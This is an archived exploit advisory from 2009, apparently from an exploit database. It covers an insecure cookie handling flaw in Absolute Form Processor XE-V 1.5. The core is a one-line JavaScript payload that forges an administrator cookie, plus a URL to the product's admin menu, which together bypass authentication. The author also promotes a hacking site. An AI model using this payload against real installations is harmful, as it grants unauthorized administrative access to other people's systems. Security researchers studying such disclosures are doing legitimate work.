id: 5096
date: 04/23/2009
title: Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
author: ZoRLu
cves: 

==============================================================
Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
==============================================================


[~] Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 11.04.2009
[~] 
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

exploit: 

javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";

after you go here:

http://www.xigla.com/absolutefp/demo/menu.asp


[~]----------------------------------------------------------------------




#  0day.today [2023-03-25]  #